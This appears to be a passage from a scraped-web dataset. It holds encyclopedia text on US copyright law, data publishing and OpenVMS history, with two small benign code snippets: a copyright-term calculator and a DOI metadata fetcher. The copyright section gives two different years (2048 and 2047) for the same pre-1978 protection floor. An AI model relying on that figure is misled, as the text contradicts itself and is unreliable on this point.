utilitarian function that is not merely to portray the appearance of the article or to convey information. An article that is normally a part of a useful article is considered a "useful article". "the design of a useful article, as defined in this section, shall be considered a pictorial, graphic, or sculptural work only if, and only to the extent that, such design incorporates pictorial, graphic, or sculptural features that can be identified separately from, and are capable of existing independently of, the utilitarian aspects of the article. 11 However, many industrial designers create works that are both artistic and functional. Under these circumstances, copyright law only protects the artistic expression of such a work, and only to the extent that the artistic expression can be separated from its utilitarian function. 12 In 2017, the US Supreme Court granted certiorari in the case Star Athletica, L. L. C. v. Varsity Brands, Inc. 
to determine when a "pictorial, graphic, or sculptural feature" incorporated into a useful article is eligible for copyright protection, 13 holding that such features are eligible for copyright protection "only if the feature (1) can be perceived as a two- or three-dimensional work of art separate from the useful article and (2) would qualify as a protectable pictorial, graphic, or sculptural work—either on its own or fixed in some other tangible medium of expression—if it were imagined separately from the useful article into which it is incorporated. 14 Star Athletica began as a suit by Varsity Brands against Star Athletica for infringing the copyright of five cheerleader uniform designs. 15 Applying its new test to the cheerleader uniform designs, the court said: First, one can identify the decorations as features having pictorial, graphic, or sculptural qualities. Second, if the arrangement of colors, shapes, stripes, and chevrons on the surface of the cheerleading uniforms were separated from the uniform and applied in another medium—for example, on a painter's canvas—they would qualify as "two-dimensional ... works of ... art". And imaginatively removing the surface decorations from the uniforms and applying them in another medium would not replicate the uniform itself. Indeed, respondents have applied the designs in this case to other media of expression—different types of clothing—without replicating the uniform. The decorations are therefore separable from the uniforms and eligible for copyright protection. 16 This produces a relatively low threshold for pictorial, graphic, or sculptural features on useful articles to be eligible for copyright protection, which one commentator clearly highlighted: the Star Athletica decision "really has ensured that all but the subtlest graphic designs will be able to gain copyright protection...once we determine that the designs 'hav e … graphic … qualities … and could be applied … on a painter's canvas, the test for copyrightability is met. 17 Works created by the federal government are not copyrightable. 18 This restriction on copyright applies to publications produced by the United States Government, and its agents or employees within the scope of their employment. 19 However, government contractors are generally not considered employees, and their works may be subject to copyright. Additionally, the government can purchase and hold the copyright to works created by third parties. The government may restrict access to works it has produced through other mechanisms. For instance, classified materials may not be protected by copyright, but are restricted by other applicable laws. Even in case of non-classified materials, there may be specific prohibitions against usage, such as the presidential seal, which is restricted for commercial uses. 20 Federal, state, and local statutes and court decisions are in the public domain and are ineligible for copyright, a concept known as the government edicts doctrine. It is not difficult to see the motivations behind this: The citizens are the authors of the law, and therefore its owners, regardless of who actually drafts the provisions, because the law derives its authority from the consent of the public, expressed through the democratic process. 21 Three key Supreme Court cases established this government edicts doctrine: Wheaton v. Peters (1834), Banks v. Manchester (1888), and Callaghan v. Myers (1888). 22 The doctrine was codified into the United States Code at 17 U.S.C. 
105 via the Copyright Act of 1976. The Copyright Office upholds this doctrine within its own regulations: As a matter of longstanding public policy, the U.S. Copyright Office will not register a government edict that has been issued by any state, local, or territorial government, including legislative enactments, judicial decisions, administrative rulings, public ordinances, or similar types of official legal materials. Likewise, the Office will not register a government edict issued by any foreign government or any translation prepared by a government employee acting within the course of his or her official duties. 23 The Supreme Court has also ruled that annotated versions of statutes or court decisions at the federal, state, and local level, when such annotations are done by members of the government as part of their duties, are ineligible for copyright in Georgia v. Public.Resource.Org, Inc. (2020). 24 There are six basic rights protected by copyright. 25 The owner of a copyright has the exclusive right to do and authorize others to do the following: A violation of any of the exclusive rights of the copyright holder is a copyright infringement, unless fair use (or a similar affirmative defense) applies. 27 The initial owner of the copyright to a work is the author, unless that work is a "work made for hire". If a work is not a work for hire, then the author will be the initial copyright owner. The author generally is the person who conceives of the copyrightable expression and "fixes" it in a "tangible medium of expression. Special rules apply when multiple authors are involved: Three types of transfers exist for copyrighted works. The first two, assignment and exclusive licenses, require the transfer to be in writing. Nonexclusive licenses need not be in writing and they may be implied by the circumstances. Transfers of copyright always involve one or more of the exclusive rights of copyright. For instance, a license may provide a right to perform a work, but not to reproduce it or to prepare a derivative work (adaptation right). 33 The terms of the license are governed by the applicable contract law; however, there is substantial academic debate about to what extent the Copyright Act preempts state contract law principles. 34 An author, after transferring a copyright, can terminate the transfer under certain circumstances. This right to terminate the transfer is absolute and cannot be waived. 35 For works published before 1978, copyrights may revert to the author after 56 years. For example, Paul McCartney reclaimed the U.S. publishing rights to early Beatles songs from Sony Music Publishing, beginning in October 2018. 36 For works published since 1978, copyrights may revert to the original author after 35 years. 17 U.S.C. 203(a) states that the author must write a letter requesting a termination of the original copyright grant at least two years before the effective termination date. 37 Title 17, United States Code, Section 108 places limitations on exclusive copyrights for the purposes of certain limited reproduction by a public library or an archive. 38 39 Title 17, United States Code, Section 107 also places statutory limits on copyright which are commonly referred to as the fair use exception. 40 41 Copyright is automatically granted to the author of an original work (that otherwise meets the basic copyright requirements, discussed above). Registration is not necessary. However, registration amplifies a copyright holder's rights in a number of ways. 
Registration, or refusal of registration, 42 is required before a lawsuit can be filed, and registration creates the possibility for enhanced "statutory" damages. A copyright can be registered online at the US Copyright Office's website. The Copyright Office reviews applications for obvious errors or lack of copyrightable subject matter and then issues a certificate of registration. The Copyright Office does not compare the author's new work against a collection of existing works or otherwise check for infringement. The United States Copyright Office requires a deposit copy of the work for which copyright registration is sought. Deposits can be made through the Copyright Office's eCO System. This deposit requirement serves two purposes. First, if a copyright infringement lawsuit arises, the owner may prove that the material that is infringed is exactly the same material for which the owner has secured a registration. Second, this requirement helps the Library of Congress build its collection of works. citation needed Failure to comply with the deposit requirement, as modified by Copyright Office regulations, is punishable by fine, but does not result in forfeiture of copyright. The use of copyright notices is optional. The Berne Convention, amending US copyright law in 1989, makes copyright automatic. 43 However, the lack of notice of copyright using these marks may have consequences in terms of reduced damages in an infringement lawsuit—using notices of this form may reduce the likelihood of a defense of "innocent infringement" being successful. 44 Copyright protection generally lasts for 70 years after the death of the author. If the work was a "work for hire", then copyright persists for 120 years after creation or 95 years after publication, whichever is shorter. For works created before 1978, the copyright duration rules are complicated. However, works published before January 1, 1929 (other than sound recordings), have made their way into the public domain. All copyright terms run to the end of the calendar year in which they would otherwise expire. 45 For works published or registered before 1978, the maximum copyright duration is 95 years from the date of publication, if copyright was renewed during the 28th year following publication. 46 Copyright renewal has been automatic since the Copyright Renewal Act of 1992. For works created before 1978, but not published or registered before 1978, the standard 302 copyright duration of 70 years from the author's death also applies. 47 Prior to 1978, works had to be published or registered to receive copyright protection. Upon the effective date of the 1976 Copyright Act (which was January 1, 1978) this requirement was removed and these unpublished, unregistered works received protection. However, Congress intended to provide an incentive for these authors to publish their unpublished works. To provide that incentive, these works, if published before 2003, would not have their protection expire before 2048. 48 All copyrightable works published in the United States before 1929 are in the public domain; 48 works created but not published or copyrighted before January 1, 1978, may be protected until 2047. 49 For works that received their copyright before 1978, a renewal had to be filed in the work's 28th year with the Copyright Office for its term of protection to be extended. 
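As a simplified, non-authoritative sketch of the term arithmetic described above (life of the author plus 70 years for ordinary works; for works made for hire, the shorter of 95 years from publication or 120 years from creation, with terms running to the end of the calendar year), the helper below ignores the special pre-1978 rules and is illustration only, not legal advice.

def copyright_expiry_year(death_year=None, publication_year=None,
                          creation_year=None, work_for_hire=False):
    # Returns the calendar year at whose end protection would lapse
    # under the simplified post-1977 rules summarized above.
    if work_for_hire:
        # Shorter of 95 years from publication or 120 years from creation.
        candidates = []
        if publication_year is not None:
            candidates.append(publication_year + 95)
        if creation_year is not None:
            candidates.append(creation_year + 120)
        return min(candidates)
    # Ordinary works: life of the author plus 70 years.
    return death_year + 70

print(copyright_expiry_year(death_year=1955))  # 2025
print(copyright_expiry_year(publication_year=1980, creation_year=1978,
                            work_for_hire=True))  # 2075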
The need for renewal was eliminated by the Copyright Renewal Act of 1992, but works that had already entered the public domain by non-renewal did not regain copyright protection. Therefore, works published before 1964 that were not renewed are in the public domain. Before 1972, sound recordings were not subject to federal copyright, but copying was nonetheless regulated under various state torts and statutes, some of which had no duration limit. The Sound Recording Amendment of 1971 extended federal copyright to recordings fixed on or after February 15, 1972, and declared that recordings fixed before that date would remain subject to state or common law copyright. Subsequent amendments had extended this latter provision until 2067. 50 As a result, older sound recordings were not subject to the expiration rules that applied to contemporary visual works. Although these could have entered the public domain as a result of government authorship or formal grant by the owner, the practical effect was to render public domain audio virtually nonexistent. 51 This situation changed with the 2018 enactment of the Music Modernization Act, which extended federal copyright protection to all sound recordings, regardless of their date of creation, and preempted state copyright laws on those works. Under the Act, the first sound recordings to enter the public domain were those fixed before 1923, which entered the public domain on January 1, 2022. Recordings fixed between 1923 and February 14, 1972, will be phased into the public domain in the following decades. 52 53 Specifically, works fixed 1923 1946 are public after 100 years and works fixed 1947 1956 after 110 years of fixation. Works fixed 1 January 1957 14 February 1972 will all become public on 15 February 2067. 48 In May 2016, Judge Percy Anderson ruled in a lawsuit between ABS Entertainment and CBS Radio that "remastered" versions of pre 1972 recordings can receive a federal copyright as a distinct work due to the amount of creative effort expressed in the process. 54 The Ninth Circuit appeals court reversed the decision in favor of ABS Entertainment. 55 United States copyright law includes numerous defenses, exceptions, and limitations. Some of the most important include: Fair use is the use of limited amounts of copyrighted material in such a way as to not be an infringement. It is codified at 17 U.S.C. 107, and states that "the fair use of a copyrighted work ... is not an infringement of copyright. The section lists four factors that must be assessed to determine whether a particular use is fair. There are no bright-line rules regarding fair use and each determination is made on an individualized case-by-case basis. 71 In addition to these four factors, the statute also allows courts to consider any other factors that may be relevant to the fair use analysis. Courts evaluate fair use claims on a case-by-case basis, and the outcome of any given case depends on the specific facts of that case. There is no formula to ensure that a predetermined percentage or amount of a work—or specific number of words, lines, pages, copies—may be used without permission. 72 The justification of the fair use doctrine turns primarily on whether, and to what extent, the challenged use is transformative. "The use must be productive and must employ the quoted matter in a different manner or for a different purpose from the original. A quotation of copyrighted material that merely repackages or republishes the original is unlikely to pass the test.... 
If, on the other hand, the secondary use adds value to the original—if the quoted matter is used as raw material, transformed in the creation of new information, new aesthetics, new insights and understandings—this is the very type of activity that the fair use doctrine intends to protect for the enrichment of society. 73 The Copyright Office provides a searchable list of fair use case law. 74 Copyright infringement occurs when someone violates one of the exclusive rights listed in 17 USC 106. Commonly, this involves someone creating or distributing a "copy" of a protected work that is "substantially similar" to the original version. Infringements requires copying. If two people happen to write exactly the same story, without knowledge of the other, there is no infringement. A copyright owner may bring a copyright infringement lawsuit in federal court. Federal courts have exclusive subject-matter jurisdiction over copyright infringement cases. 75 That is, an infringement case may not be brought in state courts. (With an exception for works not protected under Federal law, but are protected under state law, e.g. state laws prohibiting copying of sound recordings made before February 15, 1972.) Note that the Copyright Office handles copyright registrations, but it does not adjudicate copyright infringement disputes. To bring a copyright infringement lawsuit, a copyright holder must establish ownership of a valid copyright and the copying of constituent elements of the work that are original. 76 The copyright owner must also establish both (a) actual copying and (b) improper appropriation of the work. The copyright owner, as plaintiff, bears the burden of establishing these three elements of the prima facie case for infringement. A plaintiff establishes ownership by authorship (by the plaintiff itself or by someone who assigned rights to the plaintiff) of (1) an original work of authorship that is (2) fixed in a tangible medium (e.g. a book, musical recording, etc.). Registration is not required to establish copyright protection, but registration is necessary before bringing a lawsuit. Registration is also useful because it creates a presumption of a valid copyright, it allows the plaintiff to collect enhanced "statutory damages", and to be eligible for an award of attorney fees. A plaintiff establishes "actual copying" with direct or indirect evidence. Direct evidence is satisfied either by a defendant's admission to copying or the testimony of witnesses who observed the defendant in the act. More commonly, a plaintiff relies on circumstantial or indirect evidence. A court will infer copying by a showing of a "striking similarity" between the copyrighted work and the alleged copy, along with a showing of both access and use of that access. 77 A plaintiff may establish "access" by proof of distribution over a large geographical area, or by eyewitness testimony that the defendant owned a copy of the protected work. Access alone is not sufficient to establish infringement. The plaintiff must show a similarity between the two works, and the degree of similarity will affect the probability that illicit copying in fact occurred in the court's eyes. 78 Even then, the plaintiff must show that the copying amounted to improper appropriation. Indeed, the United States Supreme Court has held that not all copying constitutes infringement and a showing of misappropriation is necessary. 
79 A copyrighted work may contain elements that are not copyrightable, such as facts, ideas, themes, or content in the public domain. A plaintiff alleging misappropriation must first demonstrate that what the defendant appropriated from the copyrighted work was protectable. Second, a plaintiff must show that the intended audience will recognize substantial similarities between the two works. The intended audience may be the general public, or a specialized field. The degree of similarity necessary for a court to find misappropriation is not easily defined. Indeed, "the test for infringement of a copyright is of necessity vague. 80 Two methods are used to determine if unlawful appropriation has occurred: the "subtractive method" and the "totality method". The subtractive method, also known as the "abstraction subtraction approach", seeks to analyze which parts of a copyrighted work are protectible and which are not. 81 The unprotected elements are subtracted and the fact finder then determines whether substantial similarities exist in the protectible expression which remains. For instance, if the copyright holder for West Side Story alleged infringement, the elements of that musical borrowed from Romeo and Juliet would be subtracted before comparing it to the allegedly infringing work because Romeo and Juliet exists in the public domain. The totality method, also known as the "total concept and feel" approach, takes the work as a whole with all elements included when determining if a substantial similarity exists. This was first formulated in Roth Greeting Cards v. United Card Co. (1970). 82 The individual elements of the alleged infringing work may by themselves be substantially different from their corresponding part in the copyrighted work, but nevertheless taken together be a clear misappropriation of copyrightable material. 83 Modern courts may sometimes use both methods in their analysis of misappropriation. 84 In other instances, one method may find misappropriation while the other would not, making misappropriation a contentious topic in infringement litigation. 85 A successful copyright infringement plaintiff may seek both "injunctive relief" and monetary damages. As of 2019, the United States Supreme Court has held that a copyright holder must register his copyright with the U.S. copyright office before he may seek any judicial remedies for infringement. 86 Injunctions: Copyright Act 502 authorizes courts to grant both preliminary and permanent injunctions against copyright infringement. There are also provisions for impounding allegedly infringing copies and other materials used to infringe, and for their destruction. Damages and or Profits: Copyright Act 504 gives the copyright owner a choice of recovering: (1) their actual damages and any additional profits of the defendant; or (2) statutory damages. However, Title 17 United States Code 411(a) states that a civil action to enforce a copyright claim in a US work cannot be made until the work has been registered with the U.S. Copyright Office, with a narrow exception if the claim was filed and rejected by the Copyright Office. 87 88 In 2019, the U.S. Supreme Court decided that 411(a) requires that a lawsuit cannot be initiated until the Copyright Office has processed, not merely received, the application. 88 89 Both temporary and permanent injunctions are available to prevent or restrain infringement of a copyright. 
90 An "injunction" is a court order directing the defendant to stop doing something (e.g., stop selling infringing copies). One form of equitable relief that is available in copyright cases is a seizure order. At any time during the lawsuit, the court may order the impoundment of any and all copies of the infringing products. The seizure order may include materials used to produce such copies, such as master tapes, film negatives, printing plates, etc. Items that are impounded during the course of the lawsuit can, if the plaintiff wins, be ordered destroyed as part of the final decree. A copyright holder can also seek monetary damages. Injunctions and damages are not mutually exclusive. One can have injunctions and no damages, or damages and no injunctions, or both injunctions and damages. There are two types of damages: actual damages and profits, or statutory damages. 91 The copyright owner may recover the profits he or she would have earned absent the infringement (actual damages) and any profits the infringer might have made as a result of the infringement but that are not already considered in calculating actual damages. 91 To recover actual damages, the plaintiff must prove to the court that, in the absence of the infringement, the plaintiff would have been able to make additional sales, or perhaps been able to charge higher prices, and that this would have resulted in profits given the owner's cost structure. 92 In some cases, the profits earned by the infringer exploiting the copyrighted material may exceed those earned by or potentially available to the owner. In these circumstances, the copyright owner can recover the infringer's profits if he or she can demonstrate a nexus between the profits and the infringing use. 93 Statutory damages are available as an alternative to actual damages and profits. 94 If the copyright was registered either (a) within three months of publication or (b) before the infringement, then the plaintiff is eligible to seek statutory damages. 94 Statutory damages can be awarded by the court within the range of $750 to $30,000, but this can be lowered if the infringement is deemed inadvertent, or increased significantly if the infringement is willful. 95 Statutory damages are sometimes preferable for the plaintiff if actual damages and profits are too small, too difficult to prove, or both. There are, however, situations where statutory damages are not available. 17 U.S.C. 412 provides: Statutory damages are calculated per work infringed. 94 According to clause (1) of Title 17, U.S.C. Section 504(c), statutory damages range from $750 per work to $30,000 per work, with two principal exceptions: Damages in copyright cases can be very high. In Lowry's Reports, Inc. v. Legg Mason Inc., 97 a 2003 lawsuit between a publisher of stock analysis newsletters against a company that buys one copy of the newsletters and makes multiple copies for use in-house, the jury awarded damages actual damages for some newsletters and statutory damages for other newsletters totaling $20 million. Cost and attorney fees: Copyright Act 505 permits courts, in their discretion, to award costs against either party and to award reasonable attorney fees to the prevailing party. The court may (but is not required to) award to the "prevailing party" reasonable attorney's fees. 98 This applies to both a winning plaintiff (copyright owner) and a winning defendant (accused infringer). 99 However, attorney's fees award is not available against the government. 
Like statutory damages, attorney's fees are not available if the work infringed is not registered at the time of infringement. In addition to the civil remedies, the Copyright Act provides for criminal prosecution in some cases of willful copyright infringement. There are also criminal sanctions for fraudulent copyright notice, fraudulent removal of copyright notice, and false representations in applications for copyright registration. The Digital Millennium Copyright Act imposes criminal sanctions for certain acts of circumvention and interference with copyright management information. There are not criminal sanctions for violating the rights of attribution and integrity held by the author of a work of visual art. Criminal penalties for copyright infringement include: Nonprofit libraries, archives, education institutions and public broadcasting entities are exempt from criminal prosecution. Felony penalties for first offenses begin at seven copies for audiovisual works, and one hundred copies for sound recordings. 100 The US government, its agencies and officials, and corporations owned or controlled by it, are subject to suit for copyright infringement. All infringement claims against the U.S. that did not arise in a foreign country must be filed with the United States Court of Federal Claims within three years of the infringing action. 101 Claims filed in the wrong court are dismissed for lack of subject-matter jurisdiction. The government and its agencies are also authorized to settle the infringement claims out of court. The states have sovereign immunity provided by the Eleventh Amendment to the United States Constitution, which bars most forms of lawsuits against states in federal courts, but can be abrogated in certain circumstances by Congress. 102 103 104 The Copyright Remedy and Clarification Act of 1990 (CRCA) states in part that states are liable to copyright infringement "in the same manner and to the same extent as any nongovernmental entity" 105 and also that states and state entities and officials "shall not be immune, under the Eleventh Amendment to the Constitution of the United States or under any other doctrine of sovereign immunity, from suit in Federal Court by any person" 106 alleging copyright infringement. 107 : 1 The CRCA has been declared unconstitutional by several federal courts., 107 : 4 and this was upheld by the US Supreme Court on March 23, 2020. 108 As a result of the ruling Nautilus Productions, the plaintiff in Allen v. Cooper filed a motion for reconsideration in the United States District Court for the Eastern District of North Carolina. 109 On August 18, 2021, Judge Terrence Boyle granted the motion for reconsideration which North Carolina promptly appealed to the United States Court of Appeals for the Fourth Circuit. 110 The 4th Circuit denied the state's motion on October 14, 2022. 111 Nautilus then filed their second amended complaint on February 8, 2023, alleging 5th and 14th Amendment violations of Nautilus' constitutional rights, additional copyright violations, and claiming that North Carolina's "Blackbeard's Law" represents a Bill of Attainder. 112 113 Eight years after the passage of Blackbeard's Law, on June 30, 2023, North Carolina Gov. Roy Cooper signed a bill repealing the law. 114 Works in the public domain are free for anyone to copy and use. Strictly speaking, the term "public domain" means that the work is not covered by any intellectual property rights at all (copyright, trademark, patent, or otherwise). 
115 However, this article discusses public domain with respect to copyright only. A work may enter the public domain in a number of different ways. For example, (a) the copyright protecting the work may have expired, or (b) the owner may have explicitly donated the work to the public, or (c) the work is not the type of work that copyright can protect. The "orphan works" problem arose in the United States with the enactment of the Copyright Act of 1976, which eliminated the need to register copyrighted works, instead declaring that all "original works of authorship fixed in any tangible medium of expression" 1 fall into copyright status. The elimination of registration also eliminated a central recording location to track and identify copyright-holders. Consequently, potential users of copyrighted works, e.g., filmmakers or biographers, must assume that many works they might use are copyrighted. Where the planned use would not be otherwise permitted by law (for example, by fair use), they must themselves individually investigate the copyright status of each work they plan to use. With no central database of copyright-holders, identifying and contacting copyright-holders can sometimes be difficult; those works that fall into this category may be considered "orphaned". Critics of copyright assert that copyright protections last too long before copyrighted works are allowed to enter into the public domain. For works published after 1977, the copyright lasts for the life of the author plus 70 years. 116 However, if the work is a work for hire (that is, the work is done in the course of employment or has been commissioned) or is published anonymously, the copyright lasts between 95 and 120 years, depending on the date the work is published. 116 In 2022, legislation introduced by Senator Josh Hawley, entitled the Copyright Clause Restoration Act of 2022, seeks to reduce the protection from 70 years after the creator's death (post 1978) and 95 years (pre 1978) to 28 years, with the option to renew it at the end of that term for a limit of 56 years total. 117 These same terms were in place from 1909 up until 1976. 118 A similar bill was also introduced in 2023. 119 |
391 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_publishing | Data publishing (also data publication) is the act of releasing research data in published form for use by others. It is a practice consisting in preparing certain data or data set(s) for public use thus to make them available to everyone to use as they wish. This practice is an integral part of the open science movement. There is a large and multidisciplinary consensus on the benefits resulting from this practice. 1 2 3 The main goal is to elevate data to be first class research outputs. 4 There are a number of initiatives underway as well as points of consensus and issues still in contention. 5 There are several distinct ways to make research data available, including: Publishing data allows researchers to both make their data available to others to use, and enables datasets to be cited similarly to other research publication types (such as articles or books), thereby enabling producers of datasets to gain academic credit for their work. The motivations for publishing data may range for a desire to make research more accessible, to enable citability of datasets, or research funder or publisher mandates that require open data publishing. The UK Data Service is one key organisation working with others to raise the importance of citing data correctly 7 and helping researchers to do so. Solutions to preserve privacy within data publishing has been proposed, including privacy protection algorithms, data ”masking” methods, and regional privacy level calculation algorithm. 8 A large number of journals and publishers support supplementary material being attached to research articles, including datasets. Though historically such material might have been distributed only by request or on microform to libraries, journals today typically host such material online. Supplementary material is available to subscribers to the journal or, if the article or journal is open access, to everyone. There are a large number of data repositories, on both general and specialized topics. Many repositories are disciplinary repositories, focused on a particular research discipline such as the UK Data Service which is a trusted digital repository of social, economic and humanities data. Repositories may be free for researchers to upload their data or may charge a one-time or ongoing fee for hosting the data. These repositories offer a publicly accessible web interface for searching and browsing hosted datasets, and may include additional features such as a digital object identifier, for permanent citation of the data, and linking to associated published papers and code. Data papers or data articles are “scholarly publication of a searchable metadata document describing a particular on-line accessible dataset, or a group of datasets, published in accordance to the standard academic practices”. 9 Their final aim is to provide “information on the what, where, why, how and who of the data”. 4 The intent of a data paper is to offer descriptive information on the related dataset(s) focusing on data collection, distinguishing features, access and potential reuse rather than on data processing and analysis. 10 Because data papers are considered academic publications no different than other types of papers, they allow scientists sharing data to receive credit in currency recognizable within the academic system, thus "making data sharing count". 
11 This provides not only an additional incentive to share data but also, through the peer review process, increases the quality of metadata and thus the reusability of the shared data. Thus data papers represent the scholarly communication approach to data sharing. Despite their potential, data papers are not the ultimate and complete solution for all the data sharing and reuse issues and, in some cases, they are considered to induce false expectations in the research community. 12 Data papers are supported by a rich array of data journals, some of which are "pure", i.e. they are dedicated to publishing data papers only, while others (the majority) are "mixed", i.e. they publish a number of article types including data papers. A comprehensive survey on data journals is available. 13 A non-exhaustive list of data journals has been compiled by staff at the University of Edinburgh. 14 Examples of "pure" data journals are: Earth System Science Data, Journal of Open Archaeology Data, Open Health Data, Polar Data Journal, and Scientific Data. Examples of "mixed" journals publishing data papers are: Biodiversity Data Journal, F1000Research, GigaScience, GigaByte, PLOS ONE, and SpringerPlus. Data citation is the provision of accurate, consistent and standardised referencing for datasets, just as bibliographic citations are provided for other published sources like research articles or monographs. Typically the well established Digital Object Identifier (DOI) approach is used, with DOIs taking users to a website that contains the metadata on the dataset and the dataset itself. 15 16 A 2011 paper reported an inability to determine how often data citation happened in social sciences. 17 Papers published in 2012 and 2013 reported that data citation was becoming more common, but the practice for it was not standard. 18 19 20 In 2014 FORCE 11 published the Joint Declaration of Data Citation Principles covering the purpose, function and attributes of data citation. 21 In October 2018 CrossRef expressed its support for cataloging datasets and recommending their citation. 22 A popular data-oriented journal reported in April 2019 that it would now use data citations. 23 A June 2019 paper suggested that increased data citation will make the practice more valuable for everyone by encouraging data sharing and also by increasing the prestige of people who share. 24 Data citation is an emerging topic in computer science and it has been defined as a computational problem. 25 Indeed, citing data poses significant challenges to computer scientists, and the main problems to address are related to: 26 |
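To make the DOI-based data citation workflow above concrete, the short sketch below resolves a dataset DOI to its citation metadata using standard DOI content negotiation with the requests library. The DOI string is a hypothetical placeholder, and the CSL-JSON Accept header is an assumption about how the registration agency exposes metadata; treat this as an illustrative sketch, not a definitive recipe.

# Hedged sketch: resolve a dataset DOI to citation metadata via DOI content negotiation.
# The DOI below is a placeholder for illustration only.
import requests

def fetch_doi_metadata(doi, timeout=10):
    headers = {"Accept": "application/vnd.citationstyles.csl+json"}  # request CSL-JSON metadata
    response = requests.get(f"https://doi.org/{doi}", headers=headers, timeout=timeout)
    response.raise_for_status()
    return response.json()  # typically includes title, authors, publisher and issued date

# Example usage (hypothetical DOI):
# metadata = fetch_doi_metadata("10.1234/example.dataset")
# print(metadata.get("title"))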
392 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/VAX/VMS | OpenVMS, often referred to as just VMS, 9 is a multi-user, multiprocessing and virtual memory-based operating system. It is designed to support time-sharing, batch processing, transaction processing and workstation applications. 10 Customers using OpenVMS include banks and financial services, hospitals and healthcare, telecommunications operators, network information services, and industrial manufacturers. 11 12 During the 1990s and 2000s, there were approximately half a million VMS systems in operation worldwide. 13 14 15 It was first announced by Digital Equipment Corporation (DEC) as VAX VMS (Virtual Address eXtension Virtual Memory System 16 ) alongside the VAX 11 780 minicomputer in 1977. 17 18 19 OpenVMS has subsequently been ported to run on DEC Alpha systems, the Itanium-based HPE Integrity Servers, 20 and select x86 64 hardware and hypervisors. 21 Since 2014, OpenVMS is developed and supported by VMS Software Inc. (VSI). 22 23 OpenVMS offers high availability through clustering—the ability to distribute the system over multiple physical machines. 24 This allows clustered applications and data to remain continuously available while operating system software and hardware maintenance and upgrades are performed, 25 or if part of the cluster is destroyed. 26 VMS cluster uptimes of 17 years have been reported. 27 In April 1975, Digital Equipment Corporation embarked on a project to design a 32 bit extension to its PDP 11 computer line. The hardware component was code named Star; the operating system was code named Starlet. Roger Gourd was the project lead for VMS. Software engineers Dave Cutler, Dick Hustvedt, and Peter Lipman acted as technical project leaders. 28 The Star and Starlet projects culminated in the VAX 11 780 computer and the VAX VMS operating system. The Starlet project's code name survives in VMS in the name of several of the system libraries, including STARLET.OLB and STARLET.MLB. 29 VMS was mostly written in VAX MACRO with some components written in BLISS. 9 One of the original goals for VMS was backward compatibility with DEC's existing RSX 11M operating system. 9 Prior to the V3.0 release, VAX VMS included a compatibility layer named the RSX Application Migration Executive (RSX AME), which allowed user-mode RSX 11M software to be run unmodified on top of VMS. 30 The RSX AME played an important role on early versions of VAX VMS, which used certain RSX 11M user-mode utilities before native VAX versions had been developed. 9 By the V3.0 release, all compatibility-mode utilities were replaced with native implementations. 31 In VAX VMS V4.0, RSX AME was removed from the base system, and replaced with an optional layered product named VAX 11 RSX. 32 A number of distributions of VAX VMS were created: With the V5.0 release in April 1988, DEC began to refer to VAX VMS as simply VMS in its documentation. 47 In July 1992, 48 DEC renamed VAX VMS to OpenVMS as an indication of its support of open systems industry standards such as POSIX and Unix compatibility, 49 and to drop the VAX connection since a migration to a different architecture was underway. The OpenVMS name was first used with the OpenVMS AXP V1.0 release in November 1992. DEC began using the OpenVMS VAX name with the V6.0 release in June 1993. 50 During the 1980s, DEC planned to replace the VAX platform and the VMS operating system with the PRISM architecture and the MICA operating system. 
52 When these projects were cancelled in 1988, a team was set up to design new VAX VMS systems of comparable performance to RISC-based Unix systems. 53 After a number of failed attempts to design a faster VAX-compatible processor, the group demonstrated the feasibility of porting VMS and its applications to a RISC architecture based on PRISM. 54 This led to the creation of the Alpha architecture. 55 The project to port VMS to Alpha began in 1989, and first booted on a prototype Alpha EV3 based Alpha Demonstration Unit in early 1991. 54 56 The main challenge in porting VMS to a new architecture was that VMS and the VAX were designed together, meaning that VMS was dependent on certain details of the VAX architecture. 57 Furthermore, a significant amount of the VMS kernel, layered products, and customer-developed applications were implemented in VAX MACRO assembly code. 9 Some of the changes needed to decouple VMS from the VAX architecture included the creation of the MACRO 32 compiler, which treated VAX MACRO as a high-level language, and compiled it to Alpha object code, 58 and the emulation of certain low-level details of the VAX architecture in PALcode, such as interrupt handling and atomic queue instructions. The VMS port to Alpha resulted in the creation of two separate codebases: one for VAX, and another for Alpha. 4 The Alpha code library was based on a snapshot of the VAX VMS code base circa V5.4 2. 59 1992 saw the release of the first version of OpenVMS for Alpha AXP systems, designated OpenVMS AXP V1.0. In 1994, with the release of OpenVMS V6.1, feature (and version number) parity between the VAX and Alpha variants was achieved; this was the so-called Functional Equivalence release. 59 The decision to use the 1.x version numbering stream for the pre-production quality releases of OpenVMS AXP confused some customers, and was not repeated in the subsequent ports of OpenVMS to new platforms. 57 When VMS was ported to Alpha, it was initially left as a 32 bit only operating system. 58 This was done to ensure backwards compatibility with software written for the 32 bit VAX. 64 bit addressing was first added for Alpha in the V7.0 release. 60 In order to allow 64 bit code to interoperate with older 32 bit code, OpenVMS does not create a distinction between 32 bit and 64 bit executables, but instead allows for both 32 bit and 64 bit pointers to be used within the same code. 61 This is known as mixed pointer support. The 64 bit OpenVMS Alpha releases support a maximum virtual address space size of 8TiB (a 43 bit address space), which is the maximum supported by the Alpha 21064 and Alpha 21164. 62 One of the more noteworthy Alpha-only features of OpenVMS was OpenVMS Galaxy, which allowed the partitioning of a single SMP server to run multiple instances of OpenVMS. Galaxy supported dynamic resource allocation to running partitions, and the ability to share memory between partitions. 63 64 In 2001, prior to its acquisition by Hewlett-Packard, Compaq announced the port of OpenVMS to the Intel Itanium architecture. 65 The Itanium port was the result of Compaq's decision to discontinue future development of the Alpha architecture in favour of adopting the then-new Itanium architecture. 66 The porting began in late 2001, and the first boot on took place on January 31, 2003. 67 The first boot consisted of booting a minimal system configuration on a HP i2000 workstation, logging in as the SYSTEM user, and running the DIRECTORY command. 
